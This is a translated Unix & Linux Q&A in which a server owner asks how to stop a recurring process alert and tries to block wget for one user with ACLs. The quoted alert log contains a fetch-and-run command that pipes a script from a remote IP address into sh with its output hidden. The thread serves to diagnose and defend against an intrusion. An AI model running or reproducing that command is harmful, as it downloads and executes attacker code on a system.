进程警报-停止或阻止用户执行此操作
进程警报-停止或阻止用户执行此操作
提问于 2021-05-21 14:34:29
我如何解决这个问题?我已经试过从“Geek日记”上跟踪如何在Linux中禁用特定用户的特定命令了
User:clipdrop PID:8426 PPID:8401 Run Time:0(secs) Memory:113280(kb) RSS:1180(kb) exe:/usr/bin/bash cmd:/bin/sh -c wget -q -O - http://195.3.146.118/lr.sh | sh > /dev/null 2>&1编辑#1
运行getfacl /usr/bin/wget我得到:
getfacl: Removing leading '/' from absolute path names
# file: usr/bin/wget
# owner: root
# group: root
user::rwx
user:clipdrop:---
group::r-x
mask::r-x
other::r-x回答 1
Unix & Linux用户
回答已采纳
发布于 2021-05-21 20:53:57
在Unix/Linux上,很容易获得替代工具来执行任何恶意行为(下载随机文件、使用curl、任何FTP客户端、使用web浏览器、甚至在emacs中使用web浏览器;从控制版本系统获取源并自行编译;使用Python,它具有大多数“典型”的网络任务,这些任务要么内置在标准库中,要么作为标准库的一部分)。
页面原文内容由Unix & Linux提供。腾讯云小微IT领域专用引擎提供翻译支持
原文链接:
https://unix.stackexchange.com/questions/650784
复制相关文章
相似问题
腾讯云开发者
